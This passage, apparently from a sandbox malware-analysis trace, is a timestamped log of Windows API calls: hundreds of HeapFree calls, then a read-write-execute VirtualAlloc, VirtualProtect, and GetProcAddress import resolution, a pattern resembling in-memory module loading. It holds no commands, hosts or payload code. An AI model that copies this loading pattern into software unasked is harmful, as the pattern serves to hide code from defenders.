(in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2b11ab0 | out: hHeap=0x550000) returned 1 [0212.567] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2b24cc0 | out: hHeap=0x550000) returned 1 [0212.567] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2b37ed0 | out: hHeap=0x550000) returned 1 [0212.571] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2b4b0e0 | out: hHeap=0x550000) returned 1 [0212.571] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2b5e2f0 | out: hHeap=0x550000) returned 1 [0212.571] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2b71500 | out: hHeap=0x550000) returned 1 [0212.571] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2b84710 | out: hHeap=0x550000) returned 1 [0212.571] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2b97920 | out: hHeap=0x550000) returned 1 [0212.572] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2baab30 | out: hHeap=0x550000) returned 1 [0212.574] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2bbdd40 | out: hHeap=0x550000) returned 1 [0212.575] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2bd0f50 | out: hHeap=0x550000) returned 1 [0212.575] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2be4160 | out: hHeap=0x550000) returned 1 [0212.575] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2bf7370 | out: hHeap=0x550000) returned 1 [0212.575] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2c0a580 | out: hHeap=0x550000) returned 1 [0212.911] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2c1d790 | out: hHeap=0x550000) returned 1 [0212.911] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2c309a0 | out: hHeap=0x550000) returned 1 [0212.911] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2c43bb0 | out: hHeap=0x550000) returned 1 [0212.915] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2c56dc0 | out: hHeap=0x550000) returned 1 [0212.915] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2c69fd0 | out: hHeap=0x550000) returned 1 [0212.915] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2c7d1e0 | out: hHeap=0x550000) returned 1 [0212.915] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2c903f0 | out: hHeap=0x550000) returned 1 [0212.915] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2ca3600 | out: hHeap=0x550000) returned 1 [0212.915] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2cb6810 | out: hHeap=0x550000) returned 1 [0212.917] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2cc9a20 | out: hHeap=0x550000) returned 1 [0212.919] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2cdcc30 | out: hHeap=0x550000) returned 1 [0212.919] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2cefe40 | out: hHeap=0x550000) returned 1 [0212.919] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d03050 | out: hHeap=0x550000) returned 1 [0212.919] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d16260 | out: hHeap=0x550000) returned 1 [0212.919] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d29470 | out: hHeap=0x550000) returned 1 [0212.919] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d3c680 | out: hHeap=0x550000) returned 1 [0212.919] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d4f890 | out: hHeap=0x550000) returned 1 [0212.923] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d62aa0 | out: hHeap=0x550000) returned 1 [0212.923] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d75cb0 | out: hHeap=0x550000) returned 1 [0212.923] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d88ec0 | out: hHeap=0x550000) returned 1 [0212.923] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2d9c0d0 | out: hHeap=0x550000) returned 1 [0212.923] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2daf2e0 | out: hHeap=0x550000) returned 1 [0212.925] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2dc24f0 | out: hHeap=0x550000) returned 1 [0212.926] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2dd5700 | out: hHeap=0x550000) returned 1 [0212.926] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2de8910 | out: hHeap=0x550000) returned 1 [0212.926] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2e10080 | out: hHeap=0x550000) returned 1 [0212.926] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2e23290 | out: hHeap=0x550000) returned 1 [0212.926] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2e364a0 | out: hHeap=0x550000) returned 1 [0212.926] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2e496b0 | out: hHeap=0x550000) returned 1 [0212.926] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2e5c8c0 | out: hHeap=0x550000) returned 1 [0212.926] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2e6fad0 | out: hHeap=0x550000) returned 1 [0212.926] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2e82ce0 | out: hHeap=0x550000) returned 1 [0212.926] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2e95ef0 | out: hHeap=0x550000) returned 1 [0212.926] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2ea9100 | out: hHeap=0x550000) returned 1 [0212.931] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2ebc310 | out: hHeap=0x550000) returned 1 [0212.933] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2ecf520 | out: hHeap=0x550000) returned 1 [0212.933] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2ee2730 | out: hHeap=0x550000) returned 1 [0212.933] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2ef5940 | out: hHeap=0x550000) returned 1 [0212.933] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2f08b50 | out: hHeap=0x550000) returned 1 [0212.936] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2f1bd60 | out: hHeap=0x550000) returned 1 [0212.936] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2f2ef70 | out: hHeap=0x550000) returned 1 [0212.936] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2f42180 | out: hHeap=0x550000) returned 1 [0212.936] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2f55390 | out: hHeap=0x550000) returned 1 [0212.936] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2f685a0 | out: hHeap=0x550000) returned 1 [0212.936] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2f7b7b0 | out: hHeap=0x550000) returned 1 [0212.938] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2f8e9c0 | out: hHeap=0x550000) returned 1 [0212.940] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2fa1bd0 | out: hHeap=0x550000) returned 1 [0212.940] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2fb4de0 | out: hHeap=0x550000) returned 1 [0212.940] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2fc7ff0 | out: hHeap=0x550000) returned 1 [0212.940] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2fdb200 | out: hHeap=0x550000) returned 1 [0212.940] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x2fee410 | out: hHeap=0x550000) returned 1 [0212.940] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3001620 | out: hHeap=0x550000) returned 1 [0212.940] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3014830 | out: hHeap=0x550000) returned 1 [0213.233] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3027a40 | out: hHeap=0x550000) returned 1 [0213.233] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x303ac50 | out: hHeap=0x550000) returned 1 [0213.234] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x304de60 | out: hHeap=0x550000) returned 1 [0213.235] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3061070 | out: hHeap=0x550000) returned 1 [0213.235] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3074280 | out: hHeap=0x550000) returned 1 [0213.235] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3087490 | out: hHeap=0x550000) returned 1 [0213.235] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x309a6a0 | out: hHeap=0x550000) returned 1 [0213.235] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x30ad8b0 | out: hHeap=0x550000) returned 1 [0213.235] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x30c0ac0 | out: hHeap=0x550000) returned 1 [0213.235] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x30d3cd0 | out: hHeap=0x550000) returned 1 [0213.235] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x30e6ee0 | out: hHeap=0x550000) returned 1 [0213.235] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x30fa0f0 | out: hHeap=0x550000) returned 1 [0213.240] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x310d300 | out: hHeap=0x550000) returned 1 [0213.242] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3120510 | out: hHeap=0x550000) returned 1 [0213.246] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3133720 | out: hHeap=0x550000) returned 1 [0213.246] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3146930 | out: hHeap=0x550000) returned 1 [0213.246] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3159b40 | out: hHeap=0x550000) returned 1 [0213.246] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x316cd50 | out: hHeap=0x550000) returned 1 [0213.246] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x317ff60 | out: hHeap=0x550000) returned 1 [0213.246] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3193170 | out: hHeap=0x550000) returned 1 [0213.246] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x31a6380 | out: hHeap=0x550000) returned 1 [0213.251] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x31b9590 | out: hHeap=0x550000) returned 1 [0213.252] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x31cc7a0 | out: hHeap=0x550000) returned 1 [0213.253] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x31df9b0 | out: hHeap=0x550000) returned 1 [0213.253] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x31f2bc0 | out: hHeap=0x550000) returned 1 [0213.253] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3205dd0 | out: hHeap=0x550000) returned 1 [0213.253] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3218fe0 | out: hHeap=0x550000) returned 1 [0213.253] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x322c1f0 | out: hHeap=0x550000) returned 1 [0213.257] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x323f400 | out: hHeap=0x550000) returned 1 [0213.257] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3252610 | out: hHeap=0x550000) returned 1 [0213.258] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3265820 | out: hHeap=0x550000) returned 1 [0213.259] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3278a30 | out: hHeap=0x550000) returned 1 [0213.259] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x328bc40 | out: hHeap=0x550000) returned 1 [0213.259] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x329ee50 | out: hHeap=0x550000) returned 1 [0213.259] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x32b2060 | out: hHeap=0x550000) returned 1 [0213.259] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x32c5270 | out: hHeap=0x550000) returned 1 [0213.259] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x32d8480 | out: hHeap=0x550000) returned 1 [0213.259] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x32eb690 | out: hHeap=0x550000) returned 1 [0213.263] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x32fe8a0 | out: hHeap=0x550000) returned 1 [0213.266] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3311ab0 | out: hHeap=0x550000) returned 1 [0213.266] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3324cc0 | out: hHeap=0x550000) returned 1 [0213.266] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3337ed0 | out: hHeap=0x550000) returned 1 [0213.603] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x334b0e0 | out: hHeap=0x550000) returned 1 [0213.603] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x335e2f0 | out: hHeap=0x550000) returned 1 [0213.603] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3371500 | out: hHeap=0x550000) returned 1 [0213.603] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3384710 | out: hHeap=0x550000) returned 1 [0213.605] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3397920 | out: hHeap=0x550000) returned 1 [0213.606] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x33aab30 | out: hHeap=0x550000) returned 1 [0213.606] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x33bdd40 | out: hHeap=0x550000) returned 1 [0213.606] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x33d0f50 | out: hHeap=0x550000) returned 1 [0213.606] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x33e4160 | out: hHeap=0x550000) returned 1 [0213.606] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x33f7370 | out: hHeap=0x550000) returned 1 [0213.606] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x340a580 | out: hHeap=0x550000) returned 1 [0213.610] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x341d790 | out: hHeap=0x550000) returned 1 [0213.612] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x34309a0 | out: hHeap=0x550000) returned 1 [0213.612] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3443bb0 | out: hHeap=0x550000) returned 1 [0213.616] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3456dc0 | out: hHeap=0x550000) returned 1 [0213.616] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3469fd0 | out: hHeap=0x550000) returned 1 [0213.616] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x347d1e0 | out: hHeap=0x550000) returned 1 [0213.616] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x34903f0 | out: hHeap=0x550000) returned 1 [0213.618] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x34a3600 | out: hHeap=0x550000) returned 1 [0213.619] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x34b6810 | out: hHeap=0x550000) returned 1 [0213.619] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x34c9a20 | out: hHeap=0x550000) returned 1 [0213.619] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x34dcc30 | out: hHeap=0x550000) returned 1 [0213.619] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x34efe40 | out: hHeap=0x550000) returned 1 [0213.619] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3503050 | out: hHeap=0x550000) returned 1 [0213.623] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3516260 | out: hHeap=0x550000) returned 1 [0213.625] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3529470 | out: hHeap=0x550000) returned 1 [0213.625] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x353c680 | out: hHeap=0x550000) returned 1 [0213.625] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x354f890 | out: hHeap=0x550000) returned 1 [0213.629] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3562aa0 | out: hHeap=0x550000) returned 1 [0213.629] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3575cb0 | out: hHeap=0x550000) returned 1 [0213.630] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3588ec0 | out: hHeap=0x550000) returned 1 [0213.630] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x359c0d0 | out: hHeap=0x550000) returned 1 [0213.630] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x35af2e0 | out: hHeap=0x550000) returned 1 [0213.630] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x35c24f0 | out: hHeap=0x550000) returned 1 [0213.630] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x35d5700 | out: hHeap=0x550000) returned 1 [0213.633] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x35e8910 | out: hHeap=0x550000) returned 1 [0213.635] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x35fbb20 | out: hHeap=0x550000) returned 1 [0213.635] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x360ed30 | out: hHeap=0x550000) returned 1 [0213.635] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3621f40 | out: hHeap=0x550000) returned 1 [0213.635] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3635150 | out: hHeap=0x550000) returned 1 [0215.121] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3648360 | out: hHeap=0x550000) returned 1 [0215.123] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x365b570 | out: hHeap=0x550000) returned 1 [0215.126] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x366e780 | out: hHeap=0x550000) returned 1 [0215.126] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3681990 | out: hHeap=0x550000) returned 1 [0215.126] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3694ba0 | out: hHeap=0x550000) returned 1 [0215.127] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x36a7db0 | out: hHeap=0x550000) returned 1 [0215.128] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x36bafc0 | out: hHeap=0x550000) returned 1 [0215.128] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x36ce1d0 | out: hHeap=0x550000) returned 1 [0215.129] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x36e13e0 | out: hHeap=0x550000) returned 1 [0215.129] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x36f45f0 | out: hHeap=0x550000) returned 1 [0215.131] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3707800 | out: hHeap=0x550000) returned 1 [0215.133] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x371aa10 | out: hHeap=0x550000) returned 1 [0215.133] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x372dc20 | out: hHeap=0x550000) returned 1 [0215.133] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3740e30 | out: hHeap=0x550000) returned 1 [0215.137] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3754040 | out: hHeap=0x550000) returned 1 [0215.139] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3767250 | out: hHeap=0x550000) returned 1 [0215.141] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x377a460 | out: hHeap=0x550000) returned 1 [0215.141] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x378d670 | out: hHeap=0x550000) returned 1 [0215.142] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x37a0880 | out: hHeap=0x550000) returned 1 [0215.143] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x37b3a90 | out: hHeap=0x550000) returned 1 [0215.143] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x37c6ca0 | out: hHeap=0x550000) returned 1 [0215.143] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x37d9eb0 | out: hHeap=0x550000) returned 1 [0215.145] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x37ed0c0 | out: hHeap=0x550000) returned 1 [0215.146] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x38002d0 | out: hHeap=0x550000) returned 1 [0215.146] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x38134e0 | out: hHeap=0x550000) returned 1 [0215.148] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x38266f0 | out: hHeap=0x550000) returned 1 [0215.150] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3839900 | out: hHeap=0x550000) returned 1 [0215.150] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x384cb10 | out: hHeap=0x550000) returned 1 [0215.152] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x385fd20 | out: hHeap=0x550000) returned 1 [0215.599] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3872f30 | out: hHeap=0x550000) returned 1 [0215.603] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3886140 | out: hHeap=0x550000) returned 1 [0215.603] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3899350 | out: hHeap=0x550000) returned 1 [0215.604] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x38ac560 | out: hHeap=0x550000) returned 1 [0215.604] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x38bf770 | out: hHeap=0x550000) returned 1 [0215.605] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x38d2980 | out: hHeap=0x550000) returned 1 [0215.606] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x38e5b90 | out: hHeap=0x550000) returned 1 [0215.606] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x38f8da0 | out: hHeap=0x550000) returned 1 [0215.608] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x390bfb0 | out: hHeap=0x550000) returned 1 [0215.610] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x391f1c0 | out: hHeap=0x550000) returned 1 [0215.610] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x39323d0 | out: hHeap=0x550000) returned 1 [0215.613] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x39455e0 | out: hHeap=0x550000) returned 1 [0215.614] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x39587f0 | out: hHeap=0x550000) returned 1 [0215.617] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x396ba00 | out: hHeap=0x550000) returned 1 [0215.620] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x397ec10 | out: hHeap=0x550000) returned 1 [0215.623] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3991e20 | out: hHeap=0x550000) returned 1 [0215.623] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x39a5030 | out: hHeap=0x550000) returned 1 [0215.624] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x39b8240 | out: hHeap=0x550000) returned 1 [0215.625] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x39cb450 | out: hHeap=0x550000) returned 1 [0215.626] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x39de660 | out: hHeap=0x550000) returned 1 [0215.627] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x39f1870 | out: hHeap=0x550000) returned 1 [0215.628] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3a04a80 | out: hHeap=0x550000) returned 1 [0215.630] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3a17c90 | out: hHeap=0x550000) returned 1 [0215.632] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3a2aea0 | out: hHeap=0x550000) returned 1 [0215.634] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3a3e0b0 | out: hHeap=0x550000) returned 1 [0215.902] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3a512c0 | out: hHeap=0x550000) returned 1 [0215.905] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3a644d0 | out: hHeap=0x550000) returned 1 [0215.909] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3a776e0 | out: hHeap=0x550000) returned 1 [0215.913] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3a8a8f0 | out: hHeap=0x550000) returned 1 [0215.918] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3a9db00 | out: hHeap=0x550000) returned 1 [0215.919] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3ab0d10 | out: hHeap=0x550000) returned 1 [0215.920] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3ac3f20 | out: hHeap=0x550000) returned 1 [0215.921] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3ad7130 | out: hHeap=0x550000) returned 1 [0215.923] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3aea340 | out: hHeap=0x550000) returned 1 [0215.925] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3afd550 | out: hHeap=0x550000) returned 1 [0215.928] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3b10760 | out: hHeap=0x550000) returned 1 [0215.930] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x3b23970 | out: hHeap=0x550000) returned 1 [0215.934] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59a6a0 | out: hHeap=0x550000) returned 1 [0215.934] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0216.304] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0216.304] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0216.306] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0216.306] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0216.306] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0216.306] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0216.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0216.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0216.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0216.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0216.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0216.307] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0216.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0216.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0216.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0216.308] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 